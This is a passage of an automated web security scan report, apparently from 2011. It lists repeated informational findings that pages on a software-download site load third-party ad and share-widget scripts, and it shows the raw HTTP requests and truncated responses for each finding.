Path:   /64-bit-news-reader-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-news-reader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:50:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:32 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22news-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22news+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94415


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1365. http://www.x64bitdownload.com/64-bit-newsfeed-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsfeed-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-newsfeed-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:48:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:58:30 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37199


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1366. http://www.x64bitdownload.com/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsgroup-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-newsgroup-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:24 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1367. http://www.x64bitdownload.com/64-bit-newsgroup-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsgroup-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-newsgroup-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76091


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1368. http://www.x64bitdownload.com/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsgroups-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-newsgroups-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31386


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1369. http://www.x64bitdownload.com/64-bit-newsgroups-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsgroups-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-newsgroups-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:50:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:01:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88631


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1370. http://www.x64bitdownload.com/64-bit-newsreader-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsreader-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-newsreader-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32574


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1371. http://www.x64bitdownload.com/64-bit-newsreader-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsreader-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-newsreader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:34 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55916


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1372. http://www.x64bitdownload.com/64-bit-nntp-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-nntp-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-nntp-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:09 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31814


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1373. http://www.x64bitdownload.com/64-bit-nntp-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-nntp-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-nntp-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:13 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87718


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1374. http://www.x64bitdownload.com/64-bit-nzb-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-nzb-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-nzb-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:51:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:01:48 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60656


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1375. http://www.x64bitdownload.com/64-bit-ozum-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-ozum-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-ozum-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:38 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1376. http://www.x64bitdownload.com/64-bit-par-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-par-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-par-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:18 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64738


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1377. http://www.x64bitdownload.com/64-bit-podcast-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-podcast-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-podcast-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:18 GMT
Cache-Control: max-age=600
Pragma: cache
